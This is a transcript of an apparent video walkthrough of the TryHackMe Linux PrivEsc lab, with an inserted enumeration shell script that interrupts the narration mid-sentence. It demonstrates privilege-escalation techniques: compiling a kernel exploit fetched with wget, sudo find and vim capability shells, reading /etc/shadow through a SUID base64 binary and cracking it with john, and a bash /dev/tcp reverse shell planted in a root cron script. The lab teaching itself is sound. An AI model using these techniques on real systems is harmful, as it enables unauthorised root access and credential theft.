TryHackMe: Linux PrivEsc

Captions
all right what's up guys so today we're doing linux privilege escalation i'm going to tell you guys right now this box is very long um this is probably going to be a very long video i was going to split it up and decided i don't want to do that i want you guys to be able to just find it and go through if you if you want um i'll tell you i'm not gonna cover every single thing as in depth as i usually do because otherwise this box would take probably two hours to finish um on video now first thing what is privilege escalation privilege escalation is simply when we get a foothold in typically on a pen test specifically you're not going to get an admin account first try you're going to get a lower lend account and you need to elevate that to an admin account or or an account that has privileges that you need to access what you're trying to get so that's what it is i'm not going to dive into it whatever they're saying um so here this is exactly what they're saying here's the things you can do when you get an admin account you can reset password so you have um you know an account that you can always access bypassing access controls editing the configurations enabling persistence that's huge so that you don't lose access things like that that's the type of stuff that we're going to be or that you would be doing once you took over the admin account now i will tell you um privilege escalation is not the same as taking it taking a foothold in a network or anything like that privilege escalation is more um it's more of a feel thing like you're you're gonna try things but it's not necessarily a one-shoe fits-all type thing you're not gonna be like okay well i did this last time so it works over here it's not gonna be like that you're gonna have to mix and match you're gonna have to play with things and uh i think they did a good job on this um but there are some gotchas on this that i am going to cover um i believe i already have this machine started i'm not sure why that is 
another problem with this box i keep having these machines mess up with me on me so okay it says it's good we'll see um one thing i'll tell you guys one of the gotchas i i found using the try hack me labs is that i always ssh into them because if i switch back and forth to these boxes it logs me out every single time which really ruins reverse shells and things like that if you're constantly logging me out so i ssh into them every time you don't have to i'm just telling you if you're having issues try sshing into okay so first thing enumeration so we've covered a lot of this so i'm gonna go through this fast so the host name if you type hostname command you're gonna get the hostname now that might not be very useful to some people right but as you will see here if we get ssh into and you notice every time it's going to be karen password one is going to be the actual um the actual login until the final box so we're going to do 10 10 199 116. yes and then password one every single time all right so now you'll notice if i do hostname it's actually a little bit helpful here because we do get wade 7363 might not seem helpful but we probably have another username or user account we probably know there's a wade somewhere involved in this now there might not be it could just be whatever but it's just sometimes you'll get things like this like ubuntu blah blah and that alone gives us information on what kind of operating system it is so here you name attack a and you see we're getting not only the host name here but you're also getting linux the version number things like that here the proc file system this is going to tell you information about it too you can just cat it so look at it proc version and you see you just get a little bit more information on it cool awesome good to know um the etsy issue files same thing you can see here a little bit more of a simplistic view all right now ps command that's going to show you the processes that are running if you do ps aux 
that's going to show you processes that are running on every user so not only um if you wanted to if you're just checking to see what processes are running you also will get to see some users that you didn't know about so like you'll see root obviously um let's see some of these are root kit right there um some of these are service accounts if you're not familiar with those are i'm not gonna dive into them we don't have time on this but basically meaning that they're not actually being used by somebody they're being used by services so all right that's some of the things you can do to actually get some information now emv is environmental variables so what you're seeing here is you're actually seeing like when you type shell you're it's going to bin shell which is the bash or no it's actually just the regular shell not the bash shell excuse me um so present working directory it you can see it's that's what it currently is set these are variables that you could set change do anything with and then every time you type that so like let's say instead of using nmap you wanted it to just be in you could have an a variable that says nmap here and then points to nmap and it would just be whatever you put that's what a variable is this is a shortcut in a sense um pseudo l this is important pseudo l will tell you right here pseudo password for karen would type it in boom sorry can't use it so sudo l will tell you if you can use sudo and what you can use it on um karen she can't use it she sucks we gotta figure it out everyone knows karen's are the ones that complain so we don't wanna we wanna switch to someone else we don't want her um all right so one of the common commands using linux is ls obviously we know that again i'm not going to dive into it id this can provide general overview of users privileges and group memberships so if you type id it's the same as if you looked at the shadow file or the or i mean the password file you're going to get their gr user ids and 
things um you can see here boom there's her user she belongs to her own groups in linux if every time you if you don't have a group you just belong to your own you create your own so there's no groups is basically what that's telling us cool um all right now here's the etsy password file the same thing you're going to get there but you're going to get it for all users we're not going to dive into that yet because we're gonna use it a lot history if you log into a fresh box you can type history and see what the last commands were written um i have config that's just information from the network netstat same thing these are important because um especially right here where let's see um if you're looking at netstat and you're looking at listening ports and things like that you can read through this and do it but it's important to know what what you're looking at and how to do it because you can actually map a network a little bit based on these netstat meaning if i do netstat and i look at this i know okay that's their gateway because they're hitting that this is a connection they have with another server internally so on so forth and i'm seeing the connections and i can map what i'm where i'm going to start traversing to on a pen test the fine command find very common this is one we're going to use all day long today um actually we're going to probably use this one right here but either way um so the find commands just helps you find things you can see that you can find files specifically with certain permissions um writeable files this is another thing you guys are going to see a lot today this two dev null all that is is telling errors to go to the dev null folder which is just not to be seen get rid of them if you don't do that every time you do something as a lower end user and you get file permission denied which will be thousands and thousands of them it'll pop up on the screen if you send it to devnull you won't get that you won't see them so that's that's 
important um here you go so find command on the root directory permissions and here's the permissions that you wanna they're looking for and then you can see the two dev null so the two dev null again all it does is get rid of the errors just keep that in mind you're gonna want that um okay so to find development tools so you can see it's important to know what languages are on the actual machine the reason that's important is simple if i'm trying to run a python script on their machine and they don't have python installed it's not going to work right all right so here's what is the hostname of the target system so if you remember we already did this we typed hostname and we got wade 7363 what is the linux kernel version of the target system and you can see right here if we scroll up this is walking us through it um the guide so i actually recommend as you're going through this guide typing them out so that way you're um genuinely finding this information because otherwise you're just going to be kind of going back and forth up and down so you type you name a and you can see we get the 3.13024 generic it's down here all right now what linux is this now this one you're gonna you're gonna think that you probably can find it because it's ubuntu right there but they're looking for something specific and what they're looking for is you two run uh i think the etsy issue they want you to open that so etsy issue and you see you get the ubuntu 1404 lts that's the specific answer they're looking for what version of python language is installed all you got to do now they want you to do this find name python um if you just type python i'll tell you right now it'll pop up and you'll see the python version right there that's true with most python uh versions i i the only reason i don't say all is because maybe some older ones that i i don't mess with don't do that but um so now here's here's you're probably wondering like okay so we're getting information but what are we doing 
with it here's what you're doing your what vulnerability seems to affect the kernel enter a cve number that's the cve number what they're wanting you to do is take that kernel version okay and take the actual kernel and look basically do some research and find what vulnerability this is now all you got to do is take the kernel to to do where was it i know we just had it we could even probably just do this and copy and we don't have to do that we can just do ubuntu ubuntu 14.04 and anytime you see eol end of life it's pretty good sign there's a there's something wrong so we'll just say cbe um yeah whatever um all right so we can't let's see and there's a specific one if you look on here there's a specific we'll go up here and type out to get this specific um thing here you can see here this is you can type this specific uh version of it 3.13.0 all right you can see right there is our exploit all right and here is the cve number so just a quick google search find that um you guys can mess around there's probably a lot of vulnerabilities in this to be honest but this is the big one that they were looking for and you're probably looking at this and going uh what that's fine this is the actual payload this is what you're gonna be um using if you will um so as we're going down all right so now it's asking us scroll down here all right so we've already done that for some reason i was thinking they wanted us to take over the machine but they don't even want us to do that on this one they just want to see it perfect okay i'm just going to let you guys know i'm going to terminate the machines and start the next ones every time or try to before i even start talking about what's next because this like i said it's going to be a while um we're at 12 minutes it seems like i'm going real fast but there's it starts getting a little bit harder um so automated enumeration tools you'll see these a lot if you guys aren't familiar with these that's okay there's lin peas there's also 
wind peas if you're not familiar win peas is just a windows version of lin peas linden newm linux x-play suggester smart numeration privilege ball ball okay these are all different all different uh things but basically what they do is they run these checks on on the machine okay and they tell you uh this is vulnerable this is one or whatever and they're doing what we're doing manually throughout this bot these boxes but they're doing it automatically it's a really good thing to do just keep in mind that these are not perfect they will give you false negatives false positives and they will have you sometimes chasing uh rabbit holes that don't exist so keep that in mind all right my dog just kind of freaked out for a sec um so here it says install and try a few i do recommend that you try them um lin pieces and win piece is very good you'll see that a lot in in some ctfs and stuff all right so now we got privilege escalation kernel exploits so okay so they actually do have us do the previous box which i thought they did i couldn't remember um all right so we got kernel exploits i'm just trying to keep up with what i've got over here so that way i've got all the commands and things because otherwise i'd be here all day getting them all written back down um all right so once this starts we can actually go here back to our box because like i said i try to ssh into all the boxes i try not to um i try not to open them on that because every time i switch back or click off of it it will actually kick me off and that might not be true for you guys that's just what i've found that sometimes i'll come back and it's kicked me off so i just prefer this way okay so we're in again as karen these now here it's telling us find and use the appropriate kernel exploit to gain root privileges now here it's telling you some hints and notes about researching these are good research notes this is a big one being too specific about the kernel version sometimes if you're searching for um 
something and you're like version 1.2.2.3.4. what you know it's like that's such a specific patch that someone would on google would have had to put that key in there for you to find it where if you just put like linux 14 you know what i mean um they then a lot of vulnerabilities will pop up and you can see dive in a little bit deeper um here it's telling you here you could also use um tools like uh les or lynn p's or any of that um do x-plays require further interaction once they're run read all comments and instructions that's important so when you're on github or something like that and you're downloading these basically make sure you know what you're doing because if you don't you might get halfway through it and go it's not working but there's required steps that you're not doing um all right so now here this is a big one you're gonna see me use this a lot i i like simple servers so for me it's something i use all the time um and i've used it in the real world all the time so keep that in mind um all right so here we go we know we know the um cbe number so we don't have to worry about that and the only reason i say that is because the the it kind of gives it to you if if you get what i'm saying you could sit there and search for it but look at the hint look for the exploit codes related to the cbe you found in the previous tasks so you kind of know what you're looking for okay all right so now if we go to here and i'm just going to give this to you guys but if you did research you guys would find this anyway um if it runs one thing i've noticed the attack box also isn't running very fast today um i don't know why that is but whatever so i have www.exploit you know exploit db just like normal now the exploit three seven two nine two that's the one we're looking for all right boom all right so now sure whatever this is a attack machine all right so here's the code that we actually want so keep that in mind um you can download it if you wanted to you can do 
whatever you want to it my dog just scared the other dog and you can see right here here's copy so we copied it we could download it whatever you want to do i personally download it only because sometimes you can mess up and you can actually accidentally like copy a space or something and then be chasing that down forever and that's really frustrating so personally i download it um now a lot of you may wonder or may ask okay well i've got the download right so what do we do now so here's what here's the problem right so we have the download but we need it onto our our target machine because this is going to do the exploit for us so what we need to do is we need to change to downloads okay and it should be in there and it's not so now we got to figure out where the heck it downloaded it maybe there we go okay so it's okay so it's actually in root it's not they don't put it in downloads on this machine okay cool even easier so we'll go back to root and you can see it's right there three seven two nine twos dot c that's super easy that helps us out a lot so now all we got to do is do our python three tech m http.server okay and then you gotta put whatever um port you wanna do i you guys will notice um there's a lot of people that do like eight eight eight six six six six whatever i almost always do one two three four um doesn't really matter i just i've always done it um now you just go here and you'll say wget which is just reach out to the web and get whatever i'm telling it to and then we'll say http um to do and we we know our ip up here if you're on the attack box it's always up here that's a really good tip if you guys never see it 1010 111.32 and then you've got to make sure you tell it where you're trying to get it from because one thing i see a lot happen is they put the the http down here but they don't put the port that they're actually serving it on which is for me one two three four and then what do we want and it's i gotta remember the exact name here 
three seven two and that should do it cannot write okay so a perfect example here um let me show you here here's one of the problems so the directory that we're in is uh i think we're in yeah we're just in root here we need to copy this to something we have permission to um so i usually just use the temp folder if i can so cd temp and you can't do that so wget http 10.10.111.32 one two three four three seven two nine two dot c and you can see there it is now it's in there so all that happened there guys if you don't understand is we're in the root directory because we're not root we're not an admin we can't write in the root directory so we had to find one that we could write in you can actually find that up here they explained it a little bit better but i just went to the temp directory because typically temporary directory can be written to and now we have it so now even though we have it we have to look here ls tac la and we see that okay so 37292 we can read and write it but we can't execute it so we need to change that right because if we if we just have it sitting there nothing's gonna happen so first things first we gotta compile it because it's a compiled language so that's where we know that this this machine actually has the gcc tool on it which is perfect for us so now three seven two nine two two nine two dot c so that's just telling uh telling it to compile it using the uh compiler code okay and it's gonna actually compile it and then what output do we want and we're just gonna say um cve we don't need it to be anything crazy okay and it's gonna compile boom boom boom boom and you can see now if we hit ls there it is now we have to change the permissions if you don't change permissions all you'll have is read and write access to it so change mod and i always do 777 on these boxes because yes in a real scenario i probably wouldn't do that on my own machine because it makes me vulnerable i don't care about these boxes so 777 gives all permissions to it 
and we're going to say cbe boom now we should be able to when we hit ls there's our cve we should be able to run cbe all right now we type who am i because it mounted and now we're root look at that so now we have root access now we have access to everything so now it says what is the content of flag one dot txt okay so what do we do we just say find name flag1.txt and you're going to see a pattern here all right if i could and you can't do that drives me nuts but anyway um i'll show you guys you're gonna see a pattern here and the the pattern is pretty easy the pattern is almost all the flags are gonna be in the user or the home directory so if i find and i do it now with using looking through the root directory which is what i didn't do on the last one flag one dot txt it'll find it home map okay i'm not gonna sit here and wait for matt so we're gonna say cd home mat cat flag one dot txt and there you go there's our flag so all i did there was looked for it using the find command every one of them's gonna be in in a home users directory i'll just tell you that now to save you some time looking for them they're not very hard to find but just to let you know so now we need to terminate that machine start this machine and start talking about pseudo ex escalation so that was kernel exploits so what that means is that was an exploit actually a flaw in the system okay that's a flaw in the actual build of the os okay that's totally different than a flaw in a configuration because a flaw in configuration means that somebody didn't either didn't secure it or they improperly secured it meaning they left like for instance if someone left the root user's admin password as admin right that's a configuration issue that the ubuntu didn't make that mistake ubuntu didn't mess up and make a flawed system the system administrator who designed it made a flawed system so keep that in mind there is a difference and it's important that you know the two okay so now we're looking at 
privilege escalation pseudo we gotta wait until we see it so these are basically if you guys aren't familiar when you use sudo on linux it gives you root access so that's what we're trying to take advantage of is what can we sudo meaning what can we take advantage of that will give us root access so now once again we ssh karen at 10.10.255. 196. boom maybe there we go password one hopefully that worked sometimes this thing lags and it misses a letter or two um yeah it didn't work i didn't think it did all right so now this gtfo bins is a huge resource that you're gonna you're going to want to use constantly not just here but we'll go ahead and open that in a new tab and just keep it there for now thank you for finally logging me in all right so first thing if you remember we tried this earlier and we couldn't do anything but here if we type sudo l it looks like here are the three commands that we can act karen can actually run using sudo meaning as root so she can actually run the find command that's important because like right here we could actually just find if we wanted to the flag now we couldn't read it using the find command yet but we could find it because we're allowed to run find as root so keep that in mind that's kind of kind of a big deal so now it's going to explain some more stuff here you can see here it's explaining the preload option the ld preload on some systems you may see the ld preload environment it allows it to use shared libraries and then allows you to change that um that's great i like that they explain it that's not what we're doing here because that's not what the flaw here in the system is so keep that in mind um all right just trying to find where i am okay so now let's first things first let's go ahead and say sudo find right because all we want to do is see if we can find the flag first because i think it's flag two okay flag two yep so find name and you're gonna see what what we mean by this so sudo find and then we're going to 
say name flag2.txt okay all right it searches through everything here and it may not find it if it doesn't oh well um we know where it is we know it's in the um users directory okay but the point is that we can run sudo on find i'm not going to wait for this we can run pseudo on find and it doesn't stop us so that's important because you can actually use so gtfo bins you go here and you type in find and you say sudo because that's the option that we have and look at this this will give us a shell right there find so i'm going to move that over here so i can copy and copy it okay so sudo okay actually we'll just do so find dot exec slash bin sh for shell all right and then quit now this what this is is using the find command to escalate privileges okay so now you notice i'm still karen and of course you can't do that so now pseudo meaning i want to run it as uh as root we're going to go ahead and do it this way okay and boom now if i type who am i if i can spell who am i now i'm root so look at that so gtfo bins is actually a great tool that lets you look for flaws if you will so let's say you can use any of these commands like apt and you're allowed to sudo it well they'll give you a way to take advantage of that so gtfo bin is a great resource i've i've used it for years i recommend it so now how many programs can the user karen run on the target system with pseudo rights well if we look here it's nano less and find so three what's the contents of flag.flag2.txt well if we look at where we're at and we say okay cda home ls cd ubuntu there's our flag boom there's our flag okay now how would you use nmap to spawn a root shell if the user had sudo writes on nmap so what that mean what they're asking here is they want you to go onto gtfo bins and they want you to look at nmap and if you had pseudo rights and they want you to tell them this right here sudo and map interactive that's what they're looking for and the reason they're looking for that is because they want 
to see if you understand how gtfo bins works and if you know how to use it all right so now what is the hash of frank's password so this is just simply they want you to go in and they want you to say okay cat etsy shadow there's frank's hash copy it over and boom you've got it now this is where we're gonna start diving in a little deeper because we're gonna actually start taking advantage of some of these things meaning that we're going to we're gonna actually start cracking some passwords too with this all right so here we go all right so now su id so there's a difference between sudo and suid now you'll notice on here there's su id on these as well on gtfo bins so it's a good resource but don't think they're the same thing okay so sudo means that you can run that as root they gave you permission they said okay you can run it as root whatever right now suid is a bit that's turned on on these i thought there was a picture of it somewhere here um there is somewhere all right i thought there was so basically it's a permission that's set on these so you can see here they're looking for and that's what we're going to do file with permission set at zero four zero zero zero now what that means is they're looking for a file that has this little s i don't know if you guys can see that but there's a rw for read write then there's that s that's the suid bit what that means is and you can see here they'll tell you here uh but basically that's a that's a set user identification that means that the whoever runs that uses it whatever it shows here the file is executed permission of the file owner or group meaning if the see how root owns these root owns them so it's ran at whatever access the owner is so not whatever access you have not if you sudo it whatever access the owner has so that's important that we look for that because if someone let's say someone's just doing all their administration as root which they don't recommend you do this is why it can be a problem because if 
you're sitting there creating scripts as root and someone can edit that script because you have permissions messed up that means they can change that script to whatever they want and use the suid on it if you have it set now what you could could do is you could set the suid on your machine i mean on your file right as a regular user and then you could edit it with root but keep the owner as the lower end guy and then you wouldn't have to worry but if you create it as root and you have that su id set you're in trouble all right so sudo i don't know why type sudo ssh karen at 10.10.74.94 yes and you guys can see how this is starting to get longer but it's very good information okay very good all right so first thing we're going to do we're going to type that exact command find so we're gonna say find and then that little that little forward slash that's saying root directory is what it's saying type f permissions we want zero four zero zero zero ls then we want to send all the errors to dev no meaning we don't want to see the errors because if we sit there and look at the errors we're going to sit there all day long all right here we go so you can see we're starting to get a few we're getting a decent amount but are any of them useful and i can look so we have ping boom boom mount open ssh okay do we have anything crazy here that we oh base64 so base64 is a tool that lets us base 64 in code but let's see something interesting here so since we can base 64 in code have we tried let's try this so we want a base64 because base64 is now going to be ran as the root permission if that makes sense to you guys because root owns it and it has that set to where it runs as the root okay so what we're going to do base 64. 
if you guys aren't familiar with base64 all it is is literally a tool that lets you base64 in code okay and so what we can do is we can do base64 and we can simply say our etsy shadow file which has our we're gonna do the password file first just because i uh we need them both so etsy password and then we're going to put a pipe and then we're going to say base64 again but now we want to decode it okay now the reason we're doing this it sounds silly right like why would we encode it and then decode it because this is ran with root permissions and we can't read these files so if we do this it opens it and codes it and then decodes it but we took advantage of it and let it made it print it out for us even though we don't have permission to do this so now we're going to go ahead and copy all this copy cancel paste file save and i'll show you what we're doing here uh we'll go ahead and just put them on documents doesn't really matter and we'll just name this password dot txt you can name it whatever you want okay now we'll go ahead and new file exit that one now we're gonna do the exact same thing base64 and if this doesn't make sense to you guys all it is is the base64 is literally get has permission to you to run this as root so it has permission to read files that we can't normally read and the shadow file is one of them so base64 etsy shadow file now if we just did the base64 without putting the pipe and then the decode basically what would happen is it would just be all encoded we wouldn't be able to see it all right so here's the oh be quiet i don't know what your deal is dude i don't know what the hell his problem is um all right so knock it off these guys are freaking going nuts all right so now if we open this paste it save it maybe um then we go to documents because we want in the same one oh i guess i put it in the root directory i didn't realize that that's all right and we'll say shadow dot txt all right so you might wonder why i put them in the same 
directory it's because we're gonna actually um this can be stopped we did that earlier um it's because i actually wanted them where i could access them so there's passwords dot tx or password.txt and shadow.txt so if you guys have never used john the ripper um you need the password file and the shadow file you just have to have them so it can put them together um but basically what you're gonna do from here is you're just gonna do what's called unshadow and you're gonna see it will put them together so password.txt and the shadow.txt and then from there we'll just put it in um cracked.txt you can put it whatever you want all right so now when we hit it that's that cracked dot txt sitting there and then now we're going to use the actual john the ripper if you guys haven't used john ripper it's a great tool you have to say john and then specify word list that we're going to use word list and it's equal to we're going to use the etsy and then the or the i'm sorry the etsy the user share word list rock you if you guys aren't familiar the rocky.txt comes on all cali boxes and there you go and then you just have to specify which one you want to use so we want to use the cracked dot txt and we hit enter and you can see it's going to run and it's going to try and crack those passwords that we just gave it now you can see here it found karen's and it found user 2. 
So, which user shares the name of a great comic book writer? Gerry Conway, right there. What is the password of user2? Password1. In a real situation these aren't going to crack that fast, just a heads-up; it's because they're so easy to crack. Now, what was the content of the flag3.txt file? If you guys just log in as one of these users and look for it, it'll be in their home directory. I'm going to make you guys work a little bit, because like I said this is a long box and I want to see you guys do some stuff; I don't want to do everything for you. That's a fun one, because we just cracked our first passwords that I think we've done on the junior pentesting path. It's been a long path, so I don't remember; maybe we did use John the Ripper on something, but I don't remember using it.

Now, capabilities. Again, another option here in GTFOBins: capabilities, that's what they're called, so keep that in mind when you're looking; you need to know what the difference is. So you can see here: another method, blah blah blah, increase privilege level, capabilities. Capabilities help manage privileges at a more granular level. So again it's managing privileges, but this helps out the admins, and any time something is helping an admin (I won't say they're taking a shortcut) it's more likely that they will slowly slip and do it incorrectly, because it's already easier for them and it keeps getting easier. That's not to say that's true of everything, I'm just saying in my experience. So we can use the getcap tool to list enabled capabilities. First we'll ssh into it, obviously: ssh karen@10.10.139.169, yes, Password1, boom. I'm not sure why they make you start every single new box; maybe they just didn't want to have all the different vulnerabilities on one box, but either way.

Let's see: if the system administrator does not want to give this user higher privileges, which is pretty fair, they can change the capabilities of the binary. What that means is the binary would get through its task without needing higher-privileged users. So let's say you need to take backups of your stuff every day; that backup script might be able to run as root no matter who runs it, because it's only doing a backup. That's basically what we're looking at here. So getcap -r, and what we're looking for is things that have "ep". You can see here, this is what it looks like when you don't do the 2>/dev/null, and I'm going to stop it because it's just going to go all day, but that's what it looks like. getcap will generate a huge amount of errors; right there they said it and I still didn't do it. So getcap -r / 2>/dev/null. Now when you do it, it should look a little bit better for you. (My dogs are going nuts.)

"Please note that neither vim nor its copy has the SUID bit set." What they're trying to say here is that the example they're using will look like it's doing the same thing that the SUID is doing, but it's not, because you can look and see that it doesn't have the SUID bit set. They're saying notice that it doesn't have that set, but it's still doing the same thing because it has capabilities. So this is an example that they're going to use, and then we're going to do the same thing, but we've got to figure out which one they're looking for. Now if you look, it's slowly going, if it'll freaking go; it's kind of frustrating because I know which one we need and I'm waiting for it to pop up, but it's not popping up. Okay, there's vim, right there. If you guys don't know what vim is, it's... I don't want to say old school, because it's just been around a long time and it's still a good text editor, but it's a terminal text editor. It's very good; I recommend pulling up a vim cheat sheet if you aren't familiar. So what we're going to do is go to GTFOBins, vim, and then we want Capabilities. It says here if you do this it should work, that's basically what they're saying. Now I will tell you, and it says it right here, if you have Python 3 you need to change that; well, we do have Python 3. Another thing I'll tell you: I'm going to pull this over and type it out because you can't copy and paste in between. So we'll go ahead and do the :py one, and keep in mind you need :py3 here because the AttackBox does have Python 3, import os and so on. Now, if you guys aren't familiar with what's going on, these are binaries that someone has already designed specifically for this task, because it's a known thing that if vim has the capability it can do this. You'll notice what it's doing is it's going to spawn a shell for us, and if you guys are familiar with reading code at all, even if you're not really that familiar with it, you can kind of get the gist of it just by reading it. (These dogs are going to drive me nuts. Sorry, those dogs are freaking driving me nuts.) So you can follow along with the code and kind of see what's going on. We're going to hit this, hopefully it works, let's see what happens. Now we type whoami and we're root. It's that easy, guys. Now it's not always going to be that easy, but what it is is it's taking advantage of a capability that vim has, which is to run as root by itself. That's a capability, not a set permission or anything; it's called a capability. So keep in mind they're different, because the reason I say that and emphasize it is that if you are searching for SUIDs or sudo or anything like that, you're not going to find a capability. You have to search for it.

So now: complete the task described above on the target system; we did that. How many binaries have the capability? If we go back we can see it popped up, it was six. What other binary can be used through this capability? view is the other one; there was another one there. And then what's the contents of the flag? So now we just need to cd /home, I don't know who it is, okay, cd ubuntu, and then cat flag4.txt, and there you go. Now keep in mind, instead of spawning a shell you can change that command to just cat flag4 if you wanted to; you can do all kinds of stuff. So keep that in mind, that you don't always have to spawn a shell, but it's cool to do because then you have the machine taken over.

Cron jobs. This is one that, in my opinion, you're going to run into on CTFs a decent amount; you may not, but I've run into them a decent amount. What is a crontab? If you guys have ever been on Windows (and I'm sure we're going to cover these on Windows in the next box) and you've had a scheduled task, it's the same thing: a crontab is a scheduled task on the machine. So let me give you guys a scenario, which is basically what we're going to do. You have a script that runs backups every night, at midnight, and all that script says is "hey, copy the backups to this server". Cool, sounds pretty mundane, you know, whatever, doesn't sound like anything can happen. But it runs using crontab and it runs every night. Well, that script that runs every night, if it is editable, meaning I as a low-end user can edit that script, I can just change that script to give me a reverse shell that night at midnight
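Before going on with the cron box, here is an added example (my code, not from the video or from TryHackMe) that turns the checks in this room into shell functions: the getcap triage for the capabilities part above, the crontab check for the missing-or-writable-script scenario just described, and the writable-PATH and no_root_squash checks the room gets to later. Everything it runs against here is constructed sample data built inside demo_run (the crontab entries, getcap lines, paths and exports lines are made up to mirror the room, not copied from a target); on a real box you would feed the same functions getcap -r / 2>/dev/null, /etc/crontab, $PATH and /etc/exports.

```sh
#!/bin/sh
# Added example, not from the video or the room: the enumeration steps for the
# capabilities and cron job parts, plus the PATH and NFS checks the room gets
# to later, as small shell functions. Each takes its input as an argument (or
# stdin) so it runs here against the constructed data in demo_run and, on a
# target, against the real thing: getcap -r / 2>/dev/null, /etc/crontab,
# $PATH, /etc/exports.

# 1. Capabilities. getcap lists every file with caps set; SUID searches will not
#    find these. Only some caps get you root: cap_setuid (the GTFOBins vim
#    trick), the DAC caps (read/write any file), ptrace, chown/fowner, sys_admin.
#    Reads getcap output on stdin (both "path = caps" and "path caps" formats).
cap_triage() {
    awk 'tolower($0) ~ /cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|chown|fowner)/ { print $1 }'
}

# 2. Cron. For each job in a system crontab ($1) check the first word of the
#    command: report it if it is missing but its directory is writable (we can
#    create it, like /tmp/test.py) or if the file itself is writable by us.
cron_triage() {
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" |
    while read -r f1 f2 f3 f4 f5 f6 f7 rest; do
        case "$f1" in
            @*) user=$f2; cmd=$f3 ;;          # @reboot/@daily style entries
            *)  user=$f6; cmd=$f7 ;;          # min hour dom mon dow user command
        esac
        case "$cmd" in /*) ;; *) continue ;; esac   # only absolute paths checked
        if [ ! -e "$cmd" ]; then
            if [ -w "$(dirname "$cmd")" ]; then echo "MISSING_IN_WRITABLE_DIR $user $cmd"; fi
        elif [ -w "$cmd" ]; then
            echo "WRITABLE $user $cmd"
        fi
    done
}

# 3. PATH. Prints every directory in a PATH string ($1) that we can write to;
#    a binary planted there under the name of an unqualified command (thm in
#    the room) gets run instead of the real one.
path_writable_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while read -r dir; do
        if [ -n "$dir" ] && [ -d "$dir" ] && [ -w "$dir" ]; then echo "$dir"; fi
    done
}

# 4. NFS. Exports with no_root_squash keep uid 0 as uid 0 on the server, which
#    is what lets a SUID-root binary created over the mount run as root.
#    $1 = exports file; prints the exported path.
exports_no_root_squash() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | awk '/no_root_squash/ { print $1 }'
}

# Constructed fixture standing in for the target: a crontab that references one
# script that does not exist in a writable directory, one that exists and is
# world-writable, and one in a directory we cannot write to. Prints the
# findings of all four checks.
demo_run() {
    d=$(mktemp -d)
    mkdir -p "$d/tmp" "$d/home/karen"
    printf '#!/bin/bash\necho backup\n' > "$d/home/karen/backup.sh"
    chmod 777 "$d/home/karen/backup.sh"
    cat > "$d/crontab" <<EOF
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root $d/home/karen/backup.sh
* * * * * root $d/tmp/test.py
@reboot root /nonexistent/antivirus.sh
EOF
    cat > "$d/exports" <<'EOF'
# /etc/exports (constructed sample)
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/safe *(rw,sync,root_squash)
EOF
    printf '/usr/bin/ping cap_net_raw=ep\n/usr/bin/vim = cap_setuid+ep\n/usr/bin/view = cap_setuid+ep\n' | cap_triage
    cron_triage "$d/crontab"
    path_writable_dirs "/usr/local/bin:/usr/bin:$d/home/karen:/bin"
    exports_no_root_squash "$d/exports"
    rm -rf "$d"
}

demo_run
```

Run as an unprivileged user, demo_run reports vim and view (not ping, whose cap_net_raw does not help), the writable backup.sh and the missing test.py whose /tmp-style directory we can write to, the one PATH entry we own, and the two exports with no_root_squash. The antivirus.sh entry is left out because its directory is not ours to write to, which is the difference between a stale crontab entry you can use and one you cannot.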
because it's already set to run. The other thing to keep in mind is, even if it's not editable, if you don't configure it correctly, meaning you don't keep up on maintenance, you don't delete them, things like that... I'll show you what I mean by that. So first thing, ssh karen (you're killing me here, Karen) karen@10.10.60.142, yes. Now, there are some gotchas in this one too that I'm going to make sure I cover for you guys, so that you aren't sitting here for hours trying to figure it out. First things first, you've got to read the /etc/crontab file to see them. We've got four things running, and it looks like they run every minute, which the box did for us; that wouldn't actually happen, I'll just tell you that. One thing to keep in mind too: when we're setting up a reverse shell we need to have our listener up, so nc -lvnp and whatever port you want to put; I just do 1234, like I said, and it'll listen for me. I just get that out of the way. So the one I like to do here, and I would normally do this, is test.py, because it's in the temp directory and people aren't going to check that. The one they probably want us to do is Karen's backup, so that's what we're going to do. Now if we're in the home directory, the backup.sh is right there. Now if we change directories to /tmp and list it, you notice test.py is not there. This is important, because what happened is someone messed up and didn't take this out when the script got deleted. That means I could create a script named test.py in the /tmp directory and it will run for me. We'll go ahead and do that since we just changed into it. So first thing I'm going to do is use vim, and I'm going to say vim test.py to create this file. If you don't know vim, just look up a cheat sheet, I'm telling you right now. So i is insert, and we're going to say we want #!/bin/bash. Now, if I remember correctly they actually give you, I think, somewhere where this script exists; maybe not. But anyway, if you guys are wondering, you can go to PentestMonkey and just search reverse shell; it's a great resource. Here's what we're going to run, the bash one, that's all it is, it's that simple. Now I've got to bring it over here so I can type it. So there's the #!/bin/bash, you have to specify what you're doing, and then we're going to say bash -i, then >& /dev/tcp/ (this is to reach out to the reverse shell, so we need our IP, which is 10.10. one), then the port, which we did 1234, and then 0>&1. So that's all you've got to do. And then to save it, if you don't know vim, again it's Escape, :wq to save. I know it doesn't make any sense, I'll never understand it, but that's the case. So now that's supposed to run every minute. Now we still have to change things on it: number one, it has to have the right permissions, that's just necessary, so chmod on test.py. Now let's look at it. Here's the only thing I don't like: it's got karen as the owner. I want to change the owner, let me get rid of this here, chown root:root test.py. It's actually not letting us, which is fine; if it doesn't work we'll have to do the one in her home directory, which we'll go ahead and do as well. The reason for that is, you notice when you're looking at the crontab, it's looking for one owned by root. So what we're going to do is cd /home and then vim the backup.sh. Perfect, and you can see they've already got some stuff in here for us, so we'll go ahead and get rid of all that; you don't need it. Hit another space on them, and then we'll just change it right back to what it was, and that was bash -i >& /dev/tcp/... If you notice, guys, I'm still looking at the actual script; I don't have this specific bash reverse shell memorized, and I'd be surprised if people do unless you're using it all the time, which I'm not. So keep in mind that it's okay to look things up; it's not a sin to have cheat sheets all over the place. Where I used to work (now I work at home, so I can just have my notebooks and stuff) I used to have cheat sheets literally everywhere, all over my desk, all kinds of stuff. You can see I already had it: even though I changed hers, the temp one actually ran and I already had the root shell here. So we'll say whoami, and that's from the temp file one. So you can see I have it. It's asking me: how many user-defined 